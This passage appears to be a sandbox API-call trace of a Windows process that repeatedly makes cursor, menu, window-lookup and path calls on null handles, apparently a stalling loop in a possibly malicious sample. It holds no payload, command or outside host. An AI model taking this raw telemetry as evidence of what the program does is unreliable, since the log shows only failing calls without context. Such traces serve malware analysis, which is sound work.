pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.678] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.678] PathFileExistsW (pszPath=0x0) returned 0 [0100.678] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.678] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.678] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.678] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.678] GetMenu (hWnd=0x0) returned 0x0 [0100.678] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.678] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.678] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.678] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.678] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.678] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.678] GetStockObject (i=6) returned 0x1b00018 [0100.678] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.678] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.678] PathFileExistsW (pszPath=0x0) returned 0 [0100.678] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.678] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.678] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.678] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.678] GetMenu (hWnd=0x0) returned 0x0 [0100.678] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x348) returned -1 [0100.678] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.678] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.678] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.678] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.678] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.679] GetStockObject (i=6) returned 0x1b00018 [0100.679] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.679] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.679] PathFileExistsW (pszPath=0x0) returned 0 [0100.679] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.679] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.679] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.679] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.679] GetMenu (hWnd=0x0) returned 0x0 [0100.679] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x533) returned -1 [0100.679] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.679] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.679] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.679] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.679] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.679] GetStockObject (i=6) returned 0x1b00018 [0100.679] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.679] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.679] PathFileExistsW (pszPath=0x0) returned 0 [0100.679] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.679] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.679] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.679] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.679] GetMenu (hWnd=0x0) returned 0x0 [0100.679] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.679] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.679] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.679] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.679] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.679] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.679] GetStockObject (i=6) returned 0x1b00018 [0100.679] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.679] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.679] PathFileExistsW (pszPath=0x0) returned 0 [0100.679] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.679] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.680] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.680] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.680] GetMenu (hWnd=0x0) returned 0x0 [0100.680] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x348) returned -1 [0100.680] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.680] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.680] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.680] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.680] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.680] GetStockObject (i=6) returned 0x1b00018 [0100.680] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.680] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.680] PathFileExistsW (pszPath=0x0) returned 0 [0100.680] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.680] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.680] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.680] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.680] GetMenu (hWnd=0x0) returned 0x0 [0100.680] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.680] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.680] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.680] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.680] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.680] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.680] GetStockObject (i=6) returned 0x1b00018 [0100.680] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.680] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.680] PathFileExistsW (pszPath=0x0) returned 0 [0100.680] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.680] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.680] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.680] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.680] GetMenu (hWnd=0x0) returned 0x0 [0100.680] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x343) returned -1 [0100.680] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.680] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.681] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.681] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.681] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.681] GetStockObject (i=6) returned 0x1b00018 [0100.681] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.681] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.681] PathFileExistsW (pszPath=0x0) returned 0 [0100.681] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.681] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.681] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.681] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.681] GetMenu (hWnd=0x0) returned 0x0 [0100.681] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x505) returned -1 [0100.681] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.681] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.681] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.681] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.681] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.681] GetStockObject (i=6) returned 0x1b00018 [0100.681] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.681] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.681] PathFileExistsW (pszPath=0x0) returned 0 [0100.681] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.681] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.681] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.681] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.681] GetMenu (hWnd=0x0) returned 0x0 [0100.681] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.681] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.681] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.681] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.681] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.681] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.681] GetStockObject (i=6) returned 0x1b00018 [0100.681] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.682] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.682] PathFileExistsW (pszPath=0x0) returned 0 [0100.682] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.682] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.682] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.682] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.682] GetMenu (hWnd=0x0) returned 0x0 [0100.682] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x347) returned -1 [0100.682] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.682] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.682] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.682] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.682] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.682] GetStockObject (i=6) returned 0x1b00018 [0100.682] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.682] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.682] PathFileExistsW (pszPath=0x0) returned 0 [0100.682] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.682] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.682] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.682] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.682] GetMenu (hWnd=0x0) returned 0x0 [0100.682] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.682] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.682] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.682] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.682] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.682] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.682] GetStockObject (i=6) returned 0x1b00018 [0100.682] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.682] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.682] PathFileExistsW (pszPath=0x0) returned 0 [0100.682] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.682] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.682] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.682] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.683] GetMenu (hWnd=0x0) returned 0x0 [0100.683] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x347) returned -1 [0100.683] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.683] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.683] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.683] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.683] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.683] GetStockObject (i=6) returned 0x1b00018 [0100.683] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.683] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.683] PathFileExistsW (pszPath=0x0) returned 0 [0100.683] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.683] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.683] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.683] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.683] GetMenu (hWnd=0x0) returned 0x0 [0100.683] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x281) returned -1 [0100.683] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.683] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.683] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.683] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.683] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.683] GetStockObject (i=6) returned 0x1b00018 [0100.683] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.683] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.683] PathFileExistsW (pszPath=0x0) returned 0 [0100.683] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.683] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.683] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.683] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.683] GetMenu (hWnd=0x0) returned 0x0 [0100.683] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.683] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.683] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.683] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.683] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.683] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.684] GetStockObject (i=6) returned 0x1b00018 [0100.684] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.684] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.684] PathFileExistsW (pszPath=0x0) returned 0 [0100.684] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.684] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.684] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.684] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.684] GetMenu (hWnd=0x0) returned 0x0 [0100.684] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x346) returned -1 [0100.684] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.684] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.684] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.684] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.684] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.684] GetStockObject (i=6) returned 0x1b00018 [0100.684] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.684] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.684] PathFileExistsW (pszPath=0x0) returned 0 [0100.684] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.684] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.684] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.684] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.684] GetMenu (hWnd=0x0) returned 0x0 [0100.684] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.684] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.684] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.684] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.684] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.684] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.684] GetStockObject (i=6) returned 0x1b00018 [0100.684] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.684] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.684] PathFileExistsW (pszPath=0x0) returned 0 [0100.684] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.685] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.685] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.685] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.685] GetMenu (hWnd=0x0) returned 0x0 [0100.685] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x348) returned -1 [0100.685] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.685] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.685] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.685] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.685] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.685] GetStockObject (i=6) returned 0x1b00018 [0100.685] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.685] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.685] PathFileExistsW (pszPath=0x0) returned 0 [0100.685] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.685] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.685] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.685] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.685] GetMenu (hWnd=0x0) returned 0x0 [0100.685] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x280) returned -1 [0100.685] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.685] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.685] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.685] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.685] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.685] GetStockObject (i=6) returned 0x1b00018 [0100.685] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.685] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.685] PathFileExistsW (pszPath=0x0) returned 0 [0100.685] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.685] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.685] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.685] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.685] GetMenu (hWnd=0x0) returned 0x0 [0100.685] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.685] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.686] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.686] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.686] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.686] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.686] GetStockObject (i=6) returned 0x1b00018 [0100.686] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.686] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.686] PathFileExistsW (pszPath=0x0) returned 0 [0100.686] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.686] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.686] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.686] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.686] GetMenu (hWnd=0x0) returned 0x0 [0100.686] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x346) returned -1 [0100.686] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.686] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.686] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.686] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, 